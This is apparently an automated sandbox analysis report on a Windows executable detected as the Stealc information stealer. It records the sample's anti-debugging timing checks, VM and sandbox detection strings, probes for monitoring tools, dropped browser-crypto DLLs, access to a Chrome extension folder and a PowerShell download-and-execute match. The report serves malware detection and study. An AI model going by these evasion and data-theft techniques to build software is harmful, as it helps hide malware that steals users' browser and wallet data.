Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56BE5 second address: B56BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56D90 second address: B56D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57E9B second address: B57EA5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD4C8DA2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B57EA5 second address: B57EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AD64 second address: B5AD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AD68 second address: B5AD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68D64 second address: B68D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68D72 second address: B68D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B68D78 second address: B68D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DBD5 second address: B6DBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DBDB second address: B6DBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FD4C8DA2148h 0x0000000b pushad 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DBF7 second address: B6DBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DBFB second address: B6DBFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6492E second address: B64941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD4C8509C3Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7AF4C second address: B7AF91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Ah 0x00000007 jmp 00007FD4C8DA2158h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FD4C8DA2157h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7AF91 second address: B7AF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7C9DE second address: B7C9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8DA214Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8DA46 second address: B8DA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8DA4D second address: B8DA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8DBB2 second address: B8DBC2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD4C8509C36h 0x00000008 jno 00007FD4C8509C36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8DBC2 second address: B8DBD5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD4C8DA214Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8DBD5 second address: B8DBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8DBDB second address: B8DBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jnp 00007FD4C8DA2146h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8DBF3 second address: B8DBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD4C8509C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8DFF3 second address: B8DFFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD4C8DA2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E29D second address: B8E2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FD4C8509C49h 0x0000000b jmp 00007FD4C8509C42h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E2D3 second address: B8E2FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD4C8DA2154h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E2FF second address: B8E305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E706 second address: B8E716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD4C8DA2146h 0x0000000a ja 00007FD4C8DA2146h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E716 second address: B8E71A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E843 second address: B8E84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E84D second address: B8E862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD4C8509C36h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FD4C8509C36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B916C5 second address: B916C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B916C9 second address: B916CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B916CD second address: B916D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9176C second address: B917BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jng 00007FD4C8509C38h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 jbe 00007FD4C8509C3Ch 0x00000019 push 00000004h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FD4C8509C38h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 cld 0x00000036 push 62AA551Bh 0x0000003b push ecx 0x0000003c js 00007FD4C8509C3Ch 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B92DDF second address: B92DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B92DE5 second address: B92DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94BEA second address: B94BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94BEE second address: B94C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD4C8509C40h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9479F second address: B947A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B947A3 second address: B947BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B947BB second address: B947C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD4C8DA2146h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B947C7 second address: B947D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010250 second address: 5010254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010254 second address: 50102B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD4C8509C46h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FD4C8509C40h 0x00000012 push eax 0x00000013 jmp 00007FD4C8509C3Bh 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FD4C8509C46h 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 mov bh, ch 0x00000023 movsx edi, ax 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50102B5 second address: 50102BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50109D1 second address: 50109D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50109D5 second address: 50109D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50109D9 second address: 50109DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50109DF second address: 5010A19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA2154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD4C8DA2150h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD4C8DA214Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010A19 second address: 5010A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4C8509C3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010A2B second address: 5010A4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 7C3Bh 0x00000011 mov di, ax 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010A4E second address: 5010A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010A52 second address: 5010A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010A58 second address: 5010A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD4C8509C3Ch 0x00000008 pop esi 0x00000009 jmp 00007FD4C8509C3Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD4C8509C47h 0x0000001d rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8F1B40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AA01BE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A9ED7D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8EF07A instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_006A4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0069DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0069E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0069BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_006916D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_006A3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0069F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_006A38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_006A4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0069ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0069DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0069DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00691160 GetSystemInfo,ExitProcess,

0_2_00691160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1991553244.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1991553244.0000000001384000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1991553244.0000000001397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13431
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13428
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-14618
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13443
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13451
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13483

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006945C0 VirtualProtect ?,00000004,00000100,00000000

0_2_006945C0

Source: C:\Users\user\Desktop\file.exe

0_2_006A9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A9750 mov eax, dword ptr fs:[00000030h]

0_2_006A9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_006A7850

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7344, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_006A9600

Source: file.exe, file.exe, 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: #Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_006A7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_006A6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_006A7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_006A7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1717801615.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
